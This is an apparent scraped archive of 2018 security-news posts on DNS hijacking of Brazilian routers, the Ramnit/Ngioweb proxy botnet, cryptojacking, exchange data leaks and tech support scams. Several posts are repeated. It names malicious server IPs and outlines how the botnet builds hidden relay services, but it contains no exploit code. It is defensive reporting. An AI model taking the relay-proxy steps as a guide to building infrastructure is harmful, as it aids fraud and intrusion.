Category Archives: cyber crime

DNS Hijacking targets Brazilian financial institutions

Crooks are targeting DLink DSL modem routers in Brazil to redirect users to fake bank websites by carrying out DNS hijacking.

Crooks are targeting DLink DSL modem routers in Brazil to redirect users to fake bank websites by changing the DNS settings.

With this trick, cybercriminals steal login credentials for bank accounts, Radware researchers reported.

The attackers change the DNS settings pointing the network devices to DNS servers they control, in this campaign the experts observed crooks using two DNS servers, 69.162.89.185 and 198.50.222.136. The two DNS servers resolve the logical address for Banco de Brasil (www.bb.com.br) and Itau Unibanco (hostname www.itau.com.br) to bogus clones.

“The research center has been tracking malicious activity targeting DLink DSL modem routers in Brazil since June 8th. Via old exploits dating from 2015, a malicious agent is attempting to modify the DNS server settings in the routers of Brazilian residents, redirecting all their DNS requests through a malicious DNS server.” reads the analysis published by Radware.

“The malicious DNS server is hijacking requests for the hostname of Banco de Brasil (www.bb.com.br) and redirecting to a fake, cloned website hosted on the same malicious DNS server which has no connection whatsoever to the legitimate Banco de Brasil website.”

Hackers are using old exploits dating from 2015 that work on some models of DLink DSL devices, they only have to run for vulnerable routers online and change their DNS settings.

The experts highlighted that the hijacking is performed without any user interaction.

“The attack is insidious in the sense that a user is completely unaware of the change. The hijacking works without crafting or changing URLs in the user’s browser. A user can use any browser and his/her regular shortcuts, the user can type in the URL manually or even use it from mobile devices, such as a smart phone or tablet.” reads the alert published by Radware.

“The user will still be sent to the malicious website instead of to their requested website and the hijacking effectively works at the gateway level.”

Attackers carried out phishing campaigns with crafted URLs and malvertising campaigns attempting to change the DNS configuration from within the user’s browser. Such kind of attack is not a novelty, hackers are using similar techniques since 2014, in 2016, an exploit tool known as RouterHunterBr 2.0 was published online and used the same malicious URLs, but Radware is not aware of currently of abuse originating from this tool.

Radware has recorded several infections attempts for an old D-Link DSL router exploits since June 12.

DNS hijacking

The malicious URL used in the campaign appear as:

DNS hijacking 2


Several exploits  for multiple DSL routers, mostly D-Link, were available online since February, 2015:

Once the victims visit the fake websites, they will be asked for bank info, including agency number, account number, mobile phone number, card pin, eight-digit pin, and a CABB number.

The experts noticed that the phishing websites used in the campaign are flagged as not secure in the URL address.

Radware reported the campaigns to the financial institutions targeted by the attacks and fake websites have since been taken offline.

“A convenient way for checking DNS servers used by your devices and router is through websites like http://www.whatsmydnsserver.com/.
Only modems and routers that were not updated in the last two years can be exploited. Updates will protect the owner of the device and also prevent devices being enslaved for use in DDoS attacks or used to conceal targeted attacks.” recommends Radware.

Pierluigi Paganini

(Security Affairs – DNS hijacking, hacking)

The post DNS Hijacking targets Brazilian financial institutions appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 175 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A malware paralyzed TSMC plants where also Apple produces its devices
·      Do Businesses Know When Theyre Using Unethical Data?
·      Russian troll factory suspected to be behind the attack against Italian President Mattarella
·      Salesforce warns of API error that exposed Marketing data
·      Tech Support Scams improved with adoption of Call Optimization Service
·      Dept. of Energy announced the Liberty Eclipse exercise to test electrical grid against cyber attacks
·      Fortnite APK is coming soon, but it will not be available on the Google Play Store
·      TCM Bank: website misconfiguration exposed applicant data for 16 months
·      ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis
·      Duo Security created open tools and techniques to identify large Twitter botnet
·      Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges
·      HP releases firmware updates for two critical RCE flaws in Inkjet Printers
·      TSMC Chip Maker confirms its facilities were infected with WannaCry ransomware
·      GitHub started warning users when adopting compromised credentials
·      Hacking WiFi Password in a few steps using a new attack on WPA/WPA2
·      Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black botnet
·      Snapchat source Code leaked after an iOS update exposed it
·      BIND DNS software includes a security feature that could be abused to cause DoS condition
·      DeepLocker – AI-powered malware are already among us
·      Researchers find vulnerabilities in WhatsApp that allow to spread Fake News via group chats
·      Security expert discovered a bug that affects million Kaspersky VPN users
·      Social Mapper – Correlate social media profiles with facial recognition
·      The analysis of the code reuse revealed many links between North Korea malware
·      Experts explained how to hack macs in enterprises through MDM
·      Group-IB: The Shadow Market Is Flooded with Cheap Mining Software
·      Quiet Skies, TSA surveillance program targets Ordinary U.S. Citizens

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 175 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 175 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A malware paralyzed TSMC plants where also Apple produces its devices
·      Do Businesses Know When Theyre Using Unethical Data?
·      Russian troll factory suspected to be behind the attack against Italian President Mattarella
·      Salesforce warns of API error that exposed Marketing data
·      Tech Support Scams improved with adoption of Call Optimization Service
·      Dept. of Energy announced the Liberty Eclipse exercise to test electrical grid against cyber attacks
·      Fortnite APK is coming soon, but it will not be available on the Google Play Store
·      TCM Bank: website misconfiguration exposed applicant data for 16 months
·      ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis
·      Duo Security created open tools and techniques to identify large Twitter botnet
·      Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges
·      HP releases firmware updates for two critical RCE flaws in Inkjet Printers
·      TSMC Chip Maker confirms its facilities were infected with WannaCry ransomware
·      GitHub started warning users when adopting compromised credentials
·      Hacking WiFi Password in a few steps using a new attack on WPA/WPA2
·      Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black botnet
·      Snapchat source Code leaked after an iOS update exposed it
·      BIND DNS software includes a security feature that could be abused to cause DoS condition
·      DeepLocker – AI-powered malware are already among us
·      Researchers find vulnerabilities in WhatsApp that allow to spread Fake News via group chats
·      Security expert discovered a bug that affects million Kaspersky VPN users
·      Social Mapper – Correlate social media profiles with facial recognition
·      The analysis of the code reuse revealed many links between North Korea malware
·      Experts explained how to hack macs in enterprises through MDM
·      Group-IB: The Shadow Market Is Flooded with Cheap Mining Software
·      Quiet Skies, TSA surveillance program targets Ordinary U.S. Citizens

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 175 – News of the week appeared first on Security Affairs.

Security Affairs: Group-IB: The Shadow Market Is Flooded with Cheap Mining Software

Group-IB is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations.

Group-IB, an international company specializing in the prevention of cyberattacks, is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations. According to Group-IB’s Threat Intelligence, over a year, the number of shadow-forum ads offering mining software has increased fivefold (H1 2018 vs H1 2017). Group-IB experts say it is a very dangerous tendency to have so many mining Trojans available designed to use other people’s devices and infrastructure for illegitimate generation of cryptocurrency.

Cryptojacking (using computation capacity of a computer or infrastructure for cryptocurrency mining without the knowledge or consent of its owner) is still a comparatively popular method of personal gain, in spite of a clear tendency toward a decrease in the number of incidents of this type of fraud. Growth in the number of such thefts may be caused not only by the growth of mining software offers in Darknet but also by their comparatively low price, which is often less than $0.50.

Mining Software darkweb cryptojacking

 

The low entry barrier to the illegal mining market results in a situation where cryptocurrency is being mined by people without technical expertise or experience with fraudulent schemes. When they gain access to simple tools for making money off hidden cryptocurrency mining, they don’t consider it a crime, all the more so as the Russian legislative environment still leaves enough loopholes to avoid prosecution for such thefts. There are still very few arrests and cases of prosecution for cryptojacking.

One cryptocoin after another: what are the dangers of mining?

Any device (computer, smartphone, IoT, server, etc.) may be used for cryptojacking: that’s why it is not enough to install detection systems only at the workstation level. New types of mining software appear regularly that bypass security systems based on signature alone. A symmetric response to this threat is the analysis of various mining manifestations at the network level. With this end in view, it is necessary to use, among other things, behavioral analysis technologies to detect previously unknown programs and tools.

Group-IB experts warn that mining results not just in direct financial losses due to increased expenditures for electricity. It threatens the stability and continuity of business processes by decelerating corporate systems and increasing depreciation of hardware.  Infection of infrastructure with a mining Trojan may result in the failure of corporate apps, networks and systems. Unauthorized external programs working without the knowledge of business owners is fraught with reputational losses, as well as compliance and regulatory risks.

What should we do? 

Integrated countermeasures against cryptojacking require the detection of all forms of malicious codes distributed or working in the network, based on a regularly updated database of threats to systems (Threat Intelligence class). Suspicious activity should always be analyzed in a secure isolated environment to ensure the absolute confidentiality of data about infected computers, infrastructure segments and other resources. It is important not only to protect yourself within your own network, but to detect cryptomining tools running java scripts on hacked resources seeking to infect as many victims as possible. There is one more type of fraud that has been gaining popularity recently: the use of traditional insiders. Companies should be able to protect themselves against their own dishonest employees who attempt to increase their incomes at the expense of their employer’s resources.

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/

telegram | facebook | twitter | linkedin

Pierluigi Paganini

(Security Affairs – cryptojacking, DarkWeb)

The post Group-IB: The Shadow Market Is Flooded with Cheap Mining Software appeared first on Security Affairs.



Security Affairs

Group-IB: The Shadow Market Is Flooded with Cheap Mining Software

Group-IB is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations.

Group-IB, an international company specializing in the prevention of cyberattacks, is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations. According to Group-IB’s Threat Intelligence, over a year, the number of shadow-forum ads offering mining software has increased fivefold (H1 2018 vs H1 2017). Group-IB experts say it is a very dangerous tendency to have so many mining Trojans available designed to use other people’s devices and infrastructure for illegitimate generation of cryptocurrency.

Cryptojacking (using computation capacity of a computer or infrastructure for cryptocurrency mining without the knowledge or consent of its owner) is still a comparatively popular method of personal gain, in spite of a clear tendency toward a decrease in the number of incidents of this type of fraud. Growth in the number of such thefts may be caused not only by the growth of mining software offers in Darknet but also by their comparatively low price, which is often less than $0.50.

Mining Software darkweb cryptojacking

 

The low entry barrier to the illegal mining market results in a situation where cryptocurrency is being mined by people without technical expertise or experience with fraudulent schemes. When they gain access to simple tools for making money off hidden cryptocurrency mining, they don’t consider it a crime, all the more so as the Russian legislative environment still leaves enough loopholes to avoid prosecution for such thefts. There are still very few arrests and cases of prosecution for cryptojacking.

One cryptocoin after another: what are the dangers of mining?

Any device (computer, smartphone, IoT, server, etc.) may be used for cryptojacking: that’s why it is not enough to install detection systems only at the workstation level. New types of mining software appear regularly that bypass security systems based on signature alone. A symmetric response to this threat is the analysis of various mining manifestations at the network level. With this end in view, it is necessary to use, among other things, behavioral analysis technologies to detect previously unknown programs and tools.

Group-IB experts warn that mining results not just in direct financial losses due to increased expenditures for electricity. It threatens the stability and continuity of business processes by decelerating corporate systems and increasing depreciation of hardware.  Infection of infrastructure with a mining Trojan may result in the failure of corporate apps, networks and systems. Unauthorized external programs working without the knowledge of business owners is fraught with reputational losses, as well as compliance and regulatory risks.

What should we do? 

Integrated countermeasures against cryptojacking require the detection of all forms of malicious codes distributed or working in the network, based on a regularly updated database of threats to systems (Threat Intelligence class). Suspicious activity should always be analyzed in a secure isolated environment to ensure the absolute confidentiality of data about infected computers, infrastructure segments and other resources. It is important not only to protect yourself within your own network, but to detect cryptomining tools running java scripts on hacked resources seeking to infect as many victims as possible. There is one more type of fraud that has been gaining popularity recently: the use of traditional insiders. Companies should be able to protect themselves against their own dishonest employees who attempt to increase their incomes at the expense of their employer’s resources.

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/

telegram | facebook | twitter | linkedin

Pierluigi Paganini

(Security Affairs – cryptojacking, DarkWeb)

The post Group-IB: The Shadow Market Is Flooded with Cheap Mining Software appeared first on Security Affairs.

PGA Golf Championship hit with Bitcoin ransomware

By Waqas

Hackers Demand Ransom to Unlock Hijacked Files of Upcoming PGA Golf Championship. Hackers seem to have a penchant for targeting high-profile events. After successfully attempting to make American presidential elections questionable, now cybercriminals have their eyes set on key PGA tournaments. Reportedly, to jeopardize this week’s PGA Championship, which is due to be held at […]

This is a post from HackRead.com Read the original post: PGA Golf Championship hit with Bitcoin ransomware

My Little Pony animator jailed for possessing 60k child abuse images

By Carolina

He is now diagnosed with a condition called Pedophilic Disorder. An Ottawa-based animator has received 28 months in prison for possessing child pornography content. The 55-year old Tom Wysom is an artist by profession, who is known for his contribution in various animated TV shows for children including My Little Pony. At the time of his […]

This is a post from HackRead.com Read the original post: My Little Pony animator jailed for possessing 60k child abuse images

Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet

Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, created by Ramnit operators.

Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, that could be the sign of a wider ongoing operation involving the Ramnit operators.

Ramnit is one of the most popular banking malware families in existence today, it was first spotted in 2010 as a worm, in 2011, its authors improved it starting from the leaked Zeus source code turning the malware into a banking Trojan. In 2014 it reached the pinnacle of success, becoming the fourth largest botnet in the world.

In 2015, Europol partnering with several private technology firms announced the takedown of the Ramnit C2 infrastructure.

A few months later Ramnit was back, the researchers at IBM security discovered a new variant of the popular Ramnit Trojan.

Recently the experts observed that the “Black” botnet campaign has infected up 100,000 systems in two months, and this is just the tip of the iceberg because according to researchers a second-stage malware called Ngioweb is already spreading.

There is the concrete risk that Ramnit operators are using the two malware to build a large, multi-purpose proxy botnet that could be used for many fraudulent activities (i.e. DDoS attacks, ransomware-based campaigns, cryptocurrency mining campaigns).

“Recently we discovered the Ramnit C&C server (185.44.75.109) which is not related to the previously most prevalent botnet “demetra”. According to domain names which are resolved to the IP address of this C&C server, it pretends to control even old bots, first seen back in 2015. We named this botnet “Black” due to the RC4 key value, “black”, that is used for traffic encryption in this botnet.” reads the analysis published by Checkpoint security.

“This C&C server has actually been active since 6th March 2018 but didn’t attract attention because of the low capacity of the “black” botnet at that time. However, in May-July 2018 we detected a new Ramnit campaign with around 100,000 computers infected.”

According to the experts, in the Black operation, the Ramnit malware is distributed via spam campaigns. The malicious code works as a first-stage malware and it is used to deliver a second-stage malware dubbed Ngioweb.

“Ngioweb represents a multifunctional proxy server which uses its own binary protocol with two layers of encryption,” continues the analysis published by Checkpoint.

“The proxy malware supports back-connect mode, relay mode, IPv4, IPv6 protocols, TCP and UDP transports, with first samples seen in the second half of 2017.”

Ngioweb leverages a two-stage C&C infrastructure, the STAGE-0 C&C server informs the malware about the STAGE-1 C&C server while the unencrypted HTTP connection is used for this purpose. The second STAGE-1 C&C server is used for controlling malware via an encrypted connection.

Ramnit campaign

The Ngioweb malware can operate in two main modes, the Regular back-connect proxy, and the Relay proxy mode.

In a relay proxy mode, the malware allows operators to build chains of proxies and hide their services behind the IP address of a bot.

“The following sequence of actions is used for building a hidden service using the Ngioweb botnet:

  1. Ngioweb Bot-A connects to C&C STAGE-0 and receives command to connect to the server C&C STAGE-1 with address X:6666.
  2. Ngioweb Bot-A connects to C&C STAGE-1 (Server-X) at X:6666. Server-X asks the bot to start the TCP server. Ngioweb bot reports on starting TCP server with IP address and port.
  3. Malware actor publishes the address of the Bot-A in DNS (or using any other public channel).
  4. Another malware Bot-B resolves the address of Bot-A using DNS (or using any other public channel).
  5. Bot-B connects to Bot-A.
  6. Bot-A creates new connection to Server-X and works as relay between Server-X and Bot-B.

Ramnit campaign 3.png

Further details, including the IoC, are reported in the analysis published by Checkpoint.

Pierluigi Paganini

(Security Affairs – cybercrime, Ramnit botnet)

The post Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet appeared first on Security Affairs.

Duo Security created open tools and techniques to identify large Twitter botnet

Researchers at security firm Duo Security have created a set of open source tools and disclosed techniques that could be used to identify large Twitter botnet.

Security experts from Duo Security have developed a collection of open source tools and disclosed techniques that can be useful in identifying large Twitter botnet.

The experts developed the tools starting from the analysis of 88 million Twitter accounts and over half-a-billion tweets, one of the largest random datasets of Twitter accounts analyzed to date.

“This paper details the techniques and tools we created to both build a large dataset containing millions of public Twitter profiles and content, as well as to analyze the dataset looking for automated accounts.” reads the research paper published by Duo Security.

“By applying a methodical data science approach to analyzing our dataset, we were able to build a classifier that effectively finds bots at a large scale.”

The dataset was composed by using the Twitter’s API, collected records include profile name, tweet and follower count, avatar, bio, the content of tweets, and social network connections.

Practical data science techniques can be used to create a classifier that could help researchers in finding automated Twitter accounts.

The experts defined 20 unique account heuristics to discover the bots, they include the number of digits in a screen name, Entropy of the screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, average hours tweeted per day, and average “distance” of account age in retweets/replies.

The above heuristics are organized in the 3 categories, the “Account attributes,” “Content,” and “Content Metadata.”

The tools and the techniques devised by the researchers could be very useful in investigating fraudulent activities associated with Twitter botnet. The experts first identify the automated bots then they use the tool to monitor the evolution of the botnets they belong.

The experts shared a case study related to the discovery of a sophisticated botnet of at least 15,000 bots involved in a cryptocurrency scam. The analysis of the botnet and the monitoring of the malicious infrastructure over time allowed the expert to discover how bots evolve to evade detection.

The experts reported their findings to Twitter that confirmed it is aware of the problem and that is currently working on implementing new security measure to detect problematic accounts.

Twitter botnet

“Twitter is aware of this form of manipulation and is proactively implementing a number of detections to prevent these types of accounts from engaging with others in a deceptive manner. Spam and certain forms of automation are against Twitter’s rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections.” replied Twitter.

“When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter’s API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related.”.

Duo Security will release its tools as open source on August 8 during the the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” concluded Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”

Pierluigi Paganini

(Security Affairs – Twitter botnet, social media)

The post Duo Security created open tools and techniques to identify large Twitter botnet appeared first on Security Affairs.

Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges

Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents.

Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, has investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.

The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.

In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges

January holidays for hackers: a 689% surge in the number of leaks

The report «2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis»shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.

cryptocurrency exchanges affected

Toolkit and infrastructure used for attacks

Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

cryptocurrency exchanges affected

The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as the Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.

What makes a successful attack possible?

This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.

Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).

cryptocurrency exchanges affected

Attack as a premonition

Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.

“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functional of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”

Recommendations of Group-IB experts to users and exchanges

In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.

Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/

telegram | facebook | twitter | linkedin

Pierluigi Paganini

(Security Affairs – data leak, cryptocurrency exchanges)

The post Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges appeared first on Security Affairs.

iPhone Chip Maker Firm Attacked with Computer Virus

By Uzair Amir

Launch of Many New iPhone Models May be Delayed. The world’s leading semiconductors and processors’ manufacturing firm and sole supplier of Apple iPhone chipsets, Taiwan Semiconductor Manufacturing Company (TSMC), became the target of a cyber-attack on Friday night. Reportedly, TSMC had to shut down its manufacturing plants because of the attack. It is revealed that […]

This is a post from HackRead.com Read the original post: iPhone Chip Maker Firm Attacked with Computer Virus

Security Affairs: ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis

A security researcher discovered a new crypto mining worm dubbed ZombieBoy that leverages several exploits to evade detection.

The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable and leverages several exploits to evade detection.

The expert called this new malware ZombieBoy because it uses a tool called ZombieBoyTools to drop the first dll, it uses some exploits to spread.

Unlike MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect.

ZombieBoy

The cryptocurrency uses Simplified Chinese language, which suggests that its author is a Chinese coder.

The ZombieBoy mine leverages several exploits, including:

ZombieBoy also uses both NSA-linked exploits DoublePulsar and EternalBlue exploits to remotely install the main dll. The malware used the ZombieBoyTools to install the two exploits.

Once the has established a backdoor in the target system it could deliver other families of malware, such as ransomware, and keyloggers.

According to Quinn’s, the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor as well as an RDP backdoor.

The same component uses XMRIG to mine Monero coins at 43 KH/s, that means that users can earn $1,000 on a monthly base at the current rate.

“In addition, 64.exe uses XMRIG to mine for XMR.  Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.

Quinn highlighted that the miner is being updated constantly, he is observing new samples on a daily base.

The malware is able to detect VM and doesn’t run in a virtualized environment to make hard its detection.

Further details including IoCs are reported in the analysis published by the expert.

Pierluigi Paganini

(Security Affairs – miner, Monero)

The post ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis appeared first on Security Affairs.



Security Affairs

ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis

A security researcher discovered a new crypto mining worm dubbed ZombieBoy that leverages several exploits to evade detection.

The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable and leverages several exploits to evade detection.

The expert called this new malware ZombieBoy because it uses a tool called ZombieBoyTools to drop the first dll, it uses some exploits to spread.

Unlike MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect.

ZombieBoy

The cryptocurrency uses Simplified Chinese language, which suggests that its author is a Chinese coder.

The ZombieBoy mine leverages several exploits, including:

ZombieBoy also uses both NSA-linked exploits DoublePulsar and EternalBlue exploits to remotely install the main dll. The malware used the ZombieBoyTools to install the two exploits.

Once the has established a backdoor in the target system it could deliver other families of malware, such as ransomware, and keyloggers.

According to Quinn’s, the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor as well as an RDP backdoor.

The same component uses XMRIG to mine Monero coins at 43 KH/s, that means that users can earn $1,000 on a monthly base at the current rate.

“In addition, 64.exe uses XMRIG to mine for XMR.  Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.

Quinn highlighted that the miner is being updated constantly, he is observing new samples on a daily base.

The malware is able to detect VM and doesn’t run in a virtualized environment to make hard its detection.

Further details including IoCs are reported in the analysis published by the expert.

Pierluigi Paganini

(Security Affairs – miner, Monero)

The post ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis appeared first on Security Affairs.

iKeyMonitor: A parental control app ensuring safety of your child

By Carolina

Parents are raising a completely new breed of kids. Nowadays, toddlers use mobile devices and teens use text messages to communicate. Many schools have also integrated computers and tablets in their curriculum. To ensure children use the Internet safely, parents need a parental control app such as iKeyMonitor. Parents do allow their children to use […]

This is a post from HackRead.com Read the original post: iKeyMonitor: A parental control app ensuring safety of your child

Security Affairs: Tech Support Scams improved with adoption of Call Optimization Service

Security experts from Symantec are warning of tech support scams abusing Call Optimization Services to insert phone numbers.

Crooks are improving their tech support scams by using Call Optimization Services that are commonly used in legitimate call center operations to perform:

  • Tracking the source of inbound calls
  • Creation and management of phone numbers
  • Call load balancing
  • Call forwarding
  • Call analytics
  • Call routing
  • Call recording

Scammers continue to improve their techniques and now they are using the service to dynamically insert phone numbers into their scam web pages and potentially gain additional features to make their scams more successful

The scams begin when unaware victims visit a malicious website or are redirected to a bogus website in various ways such as a malvertising campaign.

“The scam web page informs the victim that the computer has been blocked due to a malware infection and tries to lure the user into calling a “toll free” number for assistance. An audio file, stating that the computer is infected, is also played in the background when the user arrives on the scam web page.” reads the analysis published by Symantec.

tech support scams

Tech Support Scam
The malicious page implements some tricks to avoid victims will close the page. The pages show display notification dialogs in full-screen mode or execute a javascript routine that makes the site unresponsive.

The pages display a list of numbers to call to fix the problem and users in panic tend to call them.

According to Symantec, crooks leverages call optimization services in order to dynamically insert phone numbers into a scam page.

This specific tech support scams not only is performing browser fingerprinting, it retrieves the browser version as well based in which crooks redirect victims to different scam pages.

Crooks used a script in the call optimization services to check a specific tag in the scam URL, then the script retrieves the scammer’s phone number from the service’s servers. When the servers return the scammer’s phone number, the tag triggers the “Callback” function that retrieves and displays the appropriate phone number for victims to call.

If the tag from the call optimization service is not present in the scam URL, the phone number is retrieved by loading an XML file using the function loadXMLDoc() which is then displayed on the scam page.

The advantage of using the call optimization service’s tag in the URL is that it allows the scammers to dynamically insert phone numbers into their scam pages that are localized. “localized” to provide a different number based on the victim’s country.
Victims are shown a phone number that calls someone that speaks their language.

“However, by using the call optimization service’s tag in the URL the scammers can dynamically insert phone numbers into their scam pages,” continues Symantec. 

“This can be useful, for example, if victims are based in multiple countries, as the victim can be shown a phone number that calls someone that speaks their language.”

Crooks can abuse Call Optimization Services in their tech support scams also for other goals, for example, to provide analytics, to implement load balancing during busy times to avoid losing calls.

Pierluigi Paganini

(Security Affairs – Call Optimization Services, tech support scams)

The post Tech Support Scams improved with adoption of Call Optimization Service appeared first on Security Affairs.



Security Affairs

Tech Support Scams improved with adoption of Call Optimization Service

Security experts from Symantec are warning of tech support scams abusing Call Optimization Services to insert phone numbers.

Crooks are improving their tech support scams by using Call Optimization Services that are commonly used in legitimate call center operations to perform:

  • Tracking the source of inbound calls
  • Creation and management of phone numbers
  • Call load balancing
  • Call forwarding
  • Call analytics
  • Call routing
  • Call recording

Scammers continue to improve their techniques and now they are using the service to dynamically insert phone numbers into their scam web pages and potentially gain additional features to make their scams more successful

The scams begin when unaware victims visit a malicious website or are redirected to a bogus website in various ways such as a malvertising campaign.

“The scam web page informs the victim that the computer has been blocked due to a malware infection and tries to lure the user into calling a “toll free” number for assistance. An audio file, stating that the computer is infected, is also played in the background when the user arrives on the scam web page.” reads the analysis published by Symantec.

tech support scams

Tech Support Scam
The malicious page implements some tricks to avoid victims will close the page. The pages show display notification dialogs in full-screen mode or execute a javascript routine that makes the site unresponsive.

The pages display a list of numbers to call to fix the problem and users in panic tend to call them.

According to Symantec, crooks leverages call optimization services in order to dynamically insert phone numbers into a scam page.

This specific tech support scams not only is performing browser fingerprinting, it retrieves the browser version as well based in which crooks redirect victims to different scam pages.

Crooks used a script in the call optimization services to check a specific tag in the scam URL, then the script retrieves the scammer’s phone number from the service’s servers. When the servers return the scammer’s phone number, the tag triggers the “Callback” function that retrieves and displays the appropriate phone number for victims to call.

If the tag from the call optimization service is not present in the scam URL, the phone number is retrieved by loading an XML file using the function loadXMLDoc() which is then displayed on the scam page.

The advantage of using the call optimization service’s tag in the URL is that it allows the scammers to dynamically insert phone numbers into their scam pages that are localized. “localized” to provide a different number based on the victim’s country.
Victims are shown a phone number that calls someone that speaks their language.

